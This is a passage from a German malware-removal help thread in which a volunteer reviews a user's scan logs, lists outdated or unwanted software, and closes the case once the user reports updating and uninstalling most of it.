Vielen Dank für die Rückmeldung.
Die Funde von MBAM hast du auch entfernen lassen, oder?
In der Logdatei steht nämlich "Keine Aktion durch Benutzer".
Ja,- habe ich und das war dann auch leider der Grund, warum ich mein Chrome verabschiedet hatte und alle 144 TAB weg waren ABER.... ich konnte alle aus dem Verlauf wiederherstellen

Hier die gewünschten Logs

FIRST.txt: hxxp://5.189.183.113/FIRST-neu.txt

Addition.txt: hxxp://5.189.183.113/Addition-neu.txt

Securitycheck.txt: hxxp://5.189.183.113/securitycheck.txt

Alt 26.03.2024, 16:44   #9
M-K-D-B
/// TB-Ausbilder
 
Keylogger am Werk? - Standard

Keylogger am Werk?



Vielen Dank für die neuen Logdateien.

Wie du der Logdatei von SecurityCheck wohl schon entnommen hast, ist deine Softwarepflege mangelhaft (Note 5).

Du solltest die Software deinstallieren und sofern noch benötigt die aktuellste Version installieren. Ich kopiere für dich mal alles hier rein:

The elevation prompt for administrators disabled
^It is recommended to enable (default): Win+R typing UserAccountControlSettings and Enter^

Malwarebytes version 5.1.0.102 v.5.1.0.102 Warning! Download Update
Notepad++ (64-bit x64) v.8.6.2 Warning! Download Update
PuTTY release 0.78 (64-bit) v.0.78.0.0 Warning! Download Update
VMware Workstation v.16.2.3 Warning! Download Update
WinSCP v.1.0 Warning! Download Update
Microsoft Visual Studio Code (User) v.1.80.0 Warning! Download Update
VeraCrypt v.1.25.9 Warning! Download Update
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.34.31931 v.14.34.31931.0 Warning! Download Update
Microsoft Office 2007 Service Pack 3 (SP3) Warning! This software is no longer supported. Please use latest Microsift Office, Office Online or LibreOffice
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.34.31931 v.14.34.31931.0 Warning! Download Update
7-Zip 21.01 alpha (x64) v.21.01 alpha Warning! Download Update
GIMP 2.10.32-1 v.2.10.32 Warning! Download Update
Signal 6.10.1 v.6.10.1 Warning! Download Update
Microsoft Teams v.1.6.00.27573 Warning! Download Update
Telegram Desktop v.4.14.13 Warning! Download Update
Vuze v.5.7.7.0 Warning! Ad-supported P2P-client.
Java(TM) 6 Update 45 (64-bit) v.6.0.450 Warning! This software is no longer supported. Please uninstall it and use Java SE 8 (jre-8u401-windows-x64.exe).
Java(TM) SE Development Kit 6 Update 45 (64-bit) v.1.6.0.450 Warning! This software is no longer supported. Please uninstall it and use Java SE Development Kit (jdk-21_windows-x64_bin.exe).
Opera Stable 108.0.5067.29 v.108.0.5067.29 Warning! Download Update
Microsoft Edge v.122.0.2365.92 Warning! Download Update

CCleaner v.6.22 Warning! Suspected demo version of anti-spyware, driver updater or optimizer. If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware. Possible you became a victim of fraud or social engineering. Computer experts no longer recommend this program.
VdhCoApp 1.6.3 Warning! Application is distributed through the partnership programs and bundle assemblies. Uninstallation recommended. Possible you became a victim of fraud or social engineering.
Bonjour v.3.0.0.10 Warning! Application is distributed through the partnership programs and bundle assemblies. Uninstallation recommended. Possible you became a victim of fraud or social engineering.
cyberJack DriverPackage 1.3.1 v.1.3.1 Warning! Suspected demo version of anti-spyware, driver updater or optimizer. If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware. Possible you became a victim of fraud or social engineering. Computer experts no longer recommend this program.
Zapptales Whatsapp 2.0.8 v.2.0.8 Warning! Suspected Adware! If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware and Malwarebytes AdwCleaner. Before uninstallation and scanning it is necessary to consult in the forum where cure is provided for you!!!
JDownloader 2 v.2.0 Warning! Suspected Adware! If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware and Malwarebytes AdwCleaner. Before uninstallation and scanning it is necessary to consult in the forum where cure is provided for you!!!
CCleaner 6.21.0.10918 v.6.21.0.10918 Warning! Suspected demo version of anti-spyware, driver updater or optimizer. If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware. Possible you became a victim of fraud or social engineering. Computer experts no longer recommend this program.
Ashampoo WinOptimizer 25 v.25.00.18 Warning! Suspected demo version of anti-spyware, driver updater or optimizer. If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware. Possible you became a victim of fraud or social engineering. Computer experts no longer recommend this program.








Entfernung der verwendeten Tools
Führe KpRm gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei.





Dann wären wir durch!
Wenn du keine Probleme mehr mit Malware hast, dann sind wir hier fertig. Deine Logdateien sind sauber.

Wenn Du möchtest, kannst Du hier sagen, ob du mit mir und meiner Hilfe zufrieden warst...
Vielleicht möchtest du das Forum mit einer kleinen Spende unterstützen.





Zum Schluss bitte unbedingt die Sicherheitsmaßnahmen lesen und umsetzen:



Hinweis:
Bitte gib mir eine kurze Rückmeldung, sobald du die oben verlinkten Informationen gelesen hast, alles erledigt ist und keine Fragen mehr vorhanden sind, so dass ich dieses Thema aus meinen Abos löschen kann.

Alt 26.03.2024, 19:31   #10
dslthomas
 
Keylogger am Werk? - Standard

Keylogger am Werk?



Zitat:
Zitat von M-K-D-B Beitrag anzeigen
Vielen Dank für die neuen Logdateien.

Wie du der Logdatei von SecurityCheck wohl schon entnommen hast, ist deine Softwarepflege mangelhaft (Note 5).
OK,- ich versuche mich al auf die Note 4 zu rechtfertigen

The elevation prompt for administrators disabled
Die liebe UAC ... ich tue mal einfach so, als wäre das deaktivieren normal :-) .. gehen wir pfeifend zu den nächsten Punkten ....

Microsoft Edge v.122.0.2365.92 Warning!
false positiv ... ich habe die aktuellste Version

Opera Stable 108.0.5067.29 v.108.0.5067.29 Warning!
false positiv ... ich habe die aktuellste Version

Java(TM) 6 Update 45 & Java(TM) SE Development Kit 6 Update 45
Die Versionen brauche ich leider. Wenn es nach mir ginge, hätte ich gar kein Java auf meinem Rechner. Diverse HP-Switche auf Arbeit und ILO´s setzen noch auf Java und hier funktioniert der Zugriff nur mit dieser völlig veralteten Java-Version.

Vuze v.5.7.7.0 Warning!
Das werde ich löschen. Es war nur ganz nützlich, weil diverse OpenSouce-Software auch auf diesem Weg downloadbar ist. Jetzt ist meine Internetanbindung schnell genug, sodass ich den direkten Weg gehen kann und nichts benötige, wo ich den Download einschränken kann.

Telegram Desktop v.4.14.13 Warning!
Habe ich soeben geupdatet

Telegram Desktop v.4.14.13 Warning!
Habe ich eben geupdatet

Signal 6.10.1 v.6.10.1 Warning!
Habe ich eben geupdatet

7-Zip 21.01 alpha (x64) v.21.01 alpha Warning! & GIMP 2.10.32-1 v.2.10.32 Warning!
Jep,- muss ich die Tage machen. Ich muss aber ein Paket für die automatische Softwareverteilung in der Firma schnüren und es erst an meinem Rechner testen.

Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.34.31931 v.14.34.31931.0 Warning!
eben geupdatet

Microsoft Office 2007 Service Pack 3 (SP3) Warning!
Ja, ist EOL und ich habe ja auch ein aktuelleres Office installiert. Ich benötige aber aus dem 2007er Office das OCR-Modul was es nur bis zu dieser Version gab. Mehr habe ich aus diesem Office-Paket auch nicht installiert.

VeraCrypt v.1.25.9 Warning!
geupdatet

Microsoft Visual Studio Code (User) v.1.80.0 Warning!
geupdatet

WinSCP v.1.0 Warning!
false positiv ... Wie auch immer der auf diese Version kommt. Ich habe die aktuellste Version 6.3.2 installiert. Ich habe den SecurityCheck eben noch einmal durchlaufen lassen,- es bleibt bei der falschen Versionierung. Installiert ist die aktuellste Version

VMware Workstation v.16.2.3 Warning!
Jep,- ist mir bekannt,- da muss ich die aktuellste Version über den Arbeitgeber beziehen.

PuTTY release 0.78 (64-bit) v.0.78.0.0 Warning!
Jep,- eben aktualisiert

Notepad++ (64-bit x64) v.8.6.2 Warning!
Wurde eben geupdatet

Malwarebytes version 5.1.0.102 v.5.1.0.102 Warning!
false positiv ... hmmm... habe ich doch erst vorgestern installiert und er sagt auch, dass ich die aktuellste Version habe.

Das restliche Gedöns habe ich deinstalliert. CCleaner, Ashampoo und Malwarebytes lasse ich noch ein paar Tage und deinstalliere sie dann.


Eine Bewertung gebe ich gleich ab und eine Spende ist eben via PayPal raus gegangen. ABER Ich habe gestern schon nach einer Möglichkeit gesucht, zu spenden. Entweder bin ich zu doof oder das ist wirklich zu versteckt platziert. Das solltet ihr wie ein Impressum, von jeder Seite aus zugänglich platzieren.

Alt 27.03.2024, 11:10   #11
M-K-D-B
/// TB-Ausbilder
 
Keylogger am Werk? - Standard

Keylogger am Werk?



Vielen Dank für dein ausführliches Feedback.

Ja, ich weiß, die Meldungen von SecurityCheck sind nicht immer richtig.

Ich bin zufrieden... Note 3. Setzen!

Alle Infos zu Spenden findest du hier... es gibt nur die Möglichkeiten via PayPal oder Überweisung.

Alt 27.03.2024, 22:28   #12
M-K-D-B
/// TB-Ausbilder
 
Keylogger am Werk? - Standard

Keylogger am Werk?



Vielen Dank für die Spende. Sie dient zur Erhaltung des Forums.



Wir sind froh, dass wir helfen konnten

Dieses Thema scheint erledigt und wird aus unseren Abos gelöscht. Solltest Du das Thema erneut brauchen, schicke uns bitte eine Erinnerung inklusive Link zum Thema.

Jeder andere bitte hier klicken und ein eigenes Thema erstellen.

Thema geschlossen

Themen zu Keylogger am Werk?
appdata, auswerten, code, erstellt, explorer, gen, google, hex, hijack, keylogger, microsoft, netzwerk, neuer, neues, opera, problem, roaming, software, suche, system, system32, tab, version, win32, windows




Ähnliche Themen: Keylogger am Werk?


  1. Ressourcenfresser am Werk, hohe CPU-Last, Windows 7
    Plagegeister aller Art und deren Bekämpfung - 10.12.2015 (5)
  2. Android 6.0: Vollverschlüsselung ab Werk für ausgewählte Geräte
    Nachrichten - 20.10.2015 (0)
  3. Android-Tablet: Trojaner ab Werk telefoniert fleißig nachhause
    Nachrichten - 30.09.2015 (0)
  4. Bei mir ist der TubeSaver am Werk
    Plagegeister aller Art und deren Bekämpfung - 12.09.2013 (15)
  5. Keylogger Trojan-Spy.Win32.KeyLogger.cqd in Windows32
    Plagegeister aller Art und deren Bekämpfung - 05.08.2010 (1)
  6. WoW Keylogger: Keylogger : TR\FakeAV.C[Trojan]
    Log-Analyse und Auswertung - 20.01.2010 (11)
  7. HijackThis?? Irgendein Virus, Bagle, Trojaner! Hilfe!!! Laie am Werk!
    Plagegeister aller Art und deren Bekämpfung - 27.10.2009 (1)
  8. WoW-Account gehackt, Trojaner am Werk?
    Log-Analyse und Auswertung - 13.08.2009 (4)
  9. Werk eines Virus?
    Mülltonne - 07.12.2008 (0)
  10. Hacker am Werk
    Log-Analyse und Auswertung - 28.10.2008 (24)
  11. War hier ein Trojaner am Werk
    Log-Analyse und Auswertung - 30.11.2007 (17)
  12. Zone Media am Werk
    Log-Analyse und Auswertung - 08.01.2007 (1)
  13. fieser Trojaner am Werk und Spy- Hilfe?
    Plagegeister aller Art und deren Bekämpfung - 27.04.2006 (8)
  14. Hartnäckige Trojaner am Werk - bitte um Hilfe!
    Log-Analyse und Auswertung - 01.03.2006 (3)
  15. Hacker am werk ?
    Log-Analyse und Auswertung - 24.10.2005 (1)
  16. Hilfe ! Newbie am Werk !
    Log-Analyse und Auswertung - 22.06.2005 (8)

Zum Thema Keylogger am Werk? - Moin, Moin, nun muss ich leider auch dieses Board in Anspruch nehmen. Ich habe das Problem, dass ich mir einen Keylogger etc. eingefangen habe. Es hatte sich bemerkbar gemacht, indem - Keylogger am Werk?...
Archiv
Du betrachtest: Keylogger am Werk? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.